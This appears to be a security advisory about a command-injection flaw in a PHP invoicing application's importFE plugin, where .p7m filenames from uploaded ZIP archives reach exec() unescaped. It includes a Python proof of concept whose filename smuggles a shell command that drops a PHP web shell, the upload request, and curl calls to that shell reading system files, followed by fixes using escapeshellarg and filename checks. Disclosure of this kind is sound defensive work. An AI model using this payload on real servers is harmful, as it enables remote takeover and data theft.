Summary

Vulnerable Code

public static function decodeP7M($file)
{
  $directory = pathinfo($file, PATHINFO DIRNAME);
  $content = file get contents($file);

  $output file = $directory.'/'.basename($file, '.p7m');

  try {
    if (function exists('exec')) {
      // VULNERABLE - No input sanitization!
      exec('openssl smime -verify -noverify -in "'.$file.'" -inform DER -out "'.$output file.'"', $output, $cmd);

• The $file parameter is passed directly into exec() without sanitization
• Although wrapped in double quotes, an attacker can escape them
• The filename comes from uploaded ZIP archives (user-controlled)

Attack Vector

Entry Points:

1. plugins/importFE ZIP/actions.php:126 (when automatic import is enabled)

foreach ($files xml as $xml) {
  if (string ends with($xml, '.p7m')) {
    $file = XML::decodeP7M($directory.'/'.$xml); // $xml from ZIP!

2. plugins/importFE/src/FatturaElettronica.php:56 (constructor)

if (string ends with($name, '.p7m')) {
  $file = XML::decodeP7M($this->file); // $name from user input!

Attack Flow:

1. Attacker creates ZIP with malicious filename
2. Upload ZIP via importFE ZIP plugin
3. Application extracts ZIP and iterates files
4. For .p7m files, decodeP7M() is called
5. Malicious filename is injected into exec() command
6. Arbitrary command executes as web server user

Proof of Concept

Step 1: Create Malicious ZIP

import zipfile

cmd = "cd files && echo '<?php system($ GET["c"]); ?>' > SHELL.php"
malicious filename = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
  zf.writestr(malicious filename, b"DUMMY P7M CONTENT")

Step 2: Upload ZIP

POST /actions.php HTTP/1.1
Host: localhost:8081
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBKunENXxjEx5VrRc
Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="blob1"; filename="exploit.zip"
Content-Type: application/zip

[ZIP CONTENT]
------WebKitFormBoundaryBKunENXxjEx5VrRc--
Content-Disposition: form-data; name="op"

save

------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id module"

14
------WebKitFormBoundaryBKunENXxjEx5VrRc
Content-Disposition: form-data; name="id plugin"

48
------WebKitFormBoundaryBKunENXxjEx5VrRc--

Step 3: Exploitation Result

HTTP/1.1 500 Internal Server Error
{"error":{"type":"Exception","message":"Start tag expected, '<' not found"}}

Step 4: Remote Code Execution

$ curl "http://localhost:8081/files/SHELL.php?c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl "http://localhost:8081/files/SHELL.php?c=cat+/etc/passwd"
[Full /etc/passwd output]

Impact

• Remote Code Execution: Full server compromise
• Data Exfiltration: Access to all application data and database
• Privilege Escalation: Potential escalation if web server runs with elevated privileges
• Persistence: Install backdoors and maintain access
• Lateral Movement: Pivot to other systems on the network

Prerequisites

• Authenticated user with access to invoice import functionality

Remediation

Input Sanitization

public static function decodeP7M($file)
{
  // Validate that file path doesn't contain shell metacharacters
  if (preg match('/[;&|`$(){}[]<>]/', $file)) {
    throw new Exception('Invalid file path');
  }

  // Better: use escapeshellarg()
  $safe file = escapeshellarg($file);
  $safe output = escapeshellarg($output file);

  exec("openssl smime -verify -noverify -in $safe file -inform DER -out $safe output", $output, $cmd);
}

Validate Filename Before Processing

// In the upload handler, validate filenames from ZIP
foreach ($files xml as $xml) {
  // Only allow alphanumeric, dots, dashes, underscores
  if (!preg match('/^[a-zA-Z0-9. -]+$/', $xml)) {
    continue; // Skip invalid filenames
  }

  if (string ends with($xml, '.p7m')) {
    $file = XML::decodeP7M($directory.'/'.$xml);
  }
}

Credit